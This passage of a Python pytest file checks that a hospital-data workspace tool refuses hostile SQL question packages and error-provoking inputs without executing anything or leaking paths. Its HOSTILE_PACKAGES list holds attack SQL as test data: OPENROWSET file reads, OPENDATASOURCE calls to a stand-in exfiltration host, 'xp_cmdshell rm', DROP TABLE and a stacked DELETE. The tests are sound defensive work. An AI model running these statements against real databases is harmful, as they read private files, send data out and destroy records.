    leaked = {p.relative_to(out).as_posix(): _planted_in(p.read_bytes()) for p in out.rglob("*") if p.is_file()}
    assert {path: names for path, names in leaked.items() if names} == {}
    # Each status, provoked in turn, names nothing of the hospital, no path and no diagnostic.
    folder = _question_folder(exported, tmp_path, name="planted_question", sql=sql)
    checked = workspace.check_folder(folder)
    result, _, record = workspace.import_question(folder, project, date=DATE)
    assert result["result"] == checked["status"] == status
    _fixed_status(result, "planted_question")
    text = (folder / workspace.RESULT).read_text(encoding="utf-8")
    assert json.loads(text) == result
    assert _leaks(text, project, tmp_path, planted) == [] and _leaks(json.dumps(result), project, tmp_path) == []
    assert sorted(p.name for p in folder.iterdir()) == sorted(list(workspace.ACCEPTED_FILES) + [workspace.RESULT])
    if status != "malformed":
        # The private side does hold the planted names, which is where they belong.
        validation = (record / "import-validation.json").read_bytes()
        assert b"hospital-schema.schemalyser.zip" in validation


# Hostile packages through the import, end to end (B4). Each is refused before anything reads it as a question, and the
# test watches for any engine, process or file that the hostile content would have reached.

@pytest.fixture()
def sentinel(tmp_path):
    """A file that a hostile package names and would change or read, with what it held and when it was last written."""
    path = tmp_path / "sentinel" / "sentinel.txt"
    path.parent.mkdir()
    path.write_text("PLANTED_SENTINEL_CONTENT\n", encoding="utf-8")
    return path, path.read_bytes(), path.stat().st_mtime_ns


@pytest.fixture()
def executions(monkeypatch):
    """Every engine connection, process and shell command started while the import runs."""
    import duckdb
    started = []
    real_connect = duckdb.connect
    monkeypatch.setattr(duckdb, "connect", lambda *a, **k: started.append(("duckdb", a)) or real_connect(*a, **k))
    real_popen = subprocess.Popen

    class Watched(real_popen):
        def __init__(self, *a, **k):
            started.append(("process", a))
            super().__init__(*a, **k)
    monkeypatch.setattr(subprocess, "Popen", Watched)
    monkeypatch.setattr(os, "system", lambda command: started.append(("shell", command)) or 1)
    return started


HOSTILE_PACKAGES = {
    "a local file": [
        "SELECT x.BulkColumn FROM OPENROWSET(BULK '{sentinel}', SINGLE_CLOB) AS x\n",
        "BULK INSERT role_patient FROM '{sentinel}'\n",
        "SELECT COUNT(*) AS n FROM OPENROWSET('Microsoft.ACE.OLEDB.12.0', 'Text;Database={folder}', 'SELECT * FROM sentinel.txt') AS x\n",
    ],
    "an external resource": [
        "SELECT p.patient_key FROM PLANTED_LINKED_SERVER.planted_db.dbo.role_patient p\n",
        "SELECT q.n FROM OPENQUERY(PLANTED_LINKED_SERVER, 'SELECT 1 AS n') AS q\n",
        "SELECT a.n FROM OPENDATASOURCE('MSOLEDBSQL', 'Data Source=https://planted-exfiltration.example.org/;').planted_db.dbo.t AS a\n",
        "EXEC ('SELECT 1') AT PLANTED_LINKED_SERVER\n",
    ],
    "a statement other than a query": [
        "EXEC xp_cmdshell 'rm {sentinel}'\n",
        "INSERT INTO role_patient (patient_key) VALUES (1)\n",
        "SELECT p.patient_key INTO PLANTED_COPY FROM role_patient p\n",
        "EXECUTE dbo.planted_procedure\n",
        "DROP TABLE role_patient\n",
        "SELECT COUNT(*) AS n FROM role_patient p; DELETE FROM role_patient\n",
    ],
}


@pytest.mark.parametrize("kind, sql", [(kind, sql) for kind, cases in HOSTILE_PACKAGES.items() for sql in cases])
def test_a_hostile_question_is_refused_end_to_end_without_running_anything_or_returning_a_diagnostic(
        exported, project, tmp_path, sentinel, executions, kind, sql):
    path, held, written = sentinel
    before = _project_files(project)
    folder = _question_folder(exported, tmp_path, name="hostile", sql=sql.format(sentinel=path, folder=path.parent))
    result, checked, record = workspace.import_question(folder, project, date=DATE)
    assert result["result"] in ("malformed", "requires_private_review") and record is None
    assert result["result"] == checked["status"] == "malformed"
    _fixed_status(result, "hostile")
    text = (folder / workspace.RESULT).read_text(encoding="utf-8")
    assert _leaks(text, path, project, tmp_path) == [] and "PLANTED" not in text and "sentinel" not in text
    # Nothing ran: no engine was opened, no process or shell started, the sentinel is as it was, and the project too.
    assert executions == []
    assert path.read_bytes() == held and path.stat().st_mtime_ns == written
    assert _project_files(project) == before


def _deep_folder(folder):
    nested = folder
    for depth in range(40):
        nested = nested / f"d{depth}"
    nested.mkdir(parents=True)
    (nested / "question.sql").write_text("SELECT 1 AS one\n", encoding="utf-8")


PROVOCATIONS = {
    "a malformed JSON file": lambda folder, path: (folder / "package.json").write_text("{not json", encoding="utf-8"),
    "a JSON file it never asked for": lambda folder, path: (folder / "question.json").write_text('{"sql": ', encoding="utf-8"),
    "an oversize file": lambda folder, path: (folder / "question.sql").write_bytes(b"-- " + b"x" * (workspace.SIZE_LIMIT + 1) + b"\nSELECT 1 AS one\n"),
    "a deep path": lambda folder, path: _deep_folder(folder),
    "an invalid encoding": lambda folder, path: (folder / "question.sql").write_bytes("SELECT 1 AS one".encode("utf-16")),
    "a byte that is no text": lambda folder, path: (folder / "note.md").write_bytes(b"\xff\xfe\xfa planted"),
    "a NUL character": lambda folder, path: (folder / "title.txt").write_bytes(b"A title\x00 with a NUL\n"),
    "a question nested past the parser's depth": lambda folder, path: (folder / "question.sql").write_text(
        "SELECT " + "(" * 3000 + "1" + ")" * 3000 + " AS one FROM role_patient p\n", encoding="utf-8"),
    "a result file that links to the sentinel": lambda folder, path: (folder / workspace.RESULT).symlink_to(path),
}


@pytest.mark.parametrize("provocation", list(PROVOCATIONS))
def test_a_package_built_to_provoke_an_error_in_the_import_returns_only_a_fixed_status(
        exported, project, tmp_path, sentinel, executions, provocation):
    path, held, written = sentinel
    before = _project_files(project)
    folder = _question_folder(exported, tmp_path, name="provoking")
    PROVOCATIONS[provocation](folder, path)
    result, checked, record = workspace.import_question(folder, project, date=DATE)
    assert result["result"] == checked["status"] == "malformed" and record is None
    _fixed_status(result, "provoking")
    text = (folder / workspace.RESULT).read_text(encoding="utf-8")
    assert not (folder / workspace.RESULT).is_symlink()
    assert _leaks(text, path, project, tmp_path) == []
    assert executions == []
    assert path.read_bytes() == held and path.stat().st_mtime_ns == written
    assert _project_files(project) == before
    # The command line, given the same package afresh, refuses it with the status and no trace of the error.
    again = _question_folder(exported, tmp_path / "command", name="provoking")
    PROVOCATIONS[provocation](again, path)
    done = subprocess.run([sys.executable, "-m", "schemalyser.workspace", "import", str(again), "--hospital", str(project)],
                          capture_output=True, text=True, cwd=ROOT / "core", timeout=300,
                          env={**os.environ, "PYTHONPATH": str(ROOT / "core")})
    assert done.returncode == 1 and "Traceback" not in done.stdout + done.stderr
    assert json.loads((again / workspace.RESULT).read_text(encoding="utf-8"))["result"] == "malformed"
    assert path.read_bytes() == held and _project_files(project) == before
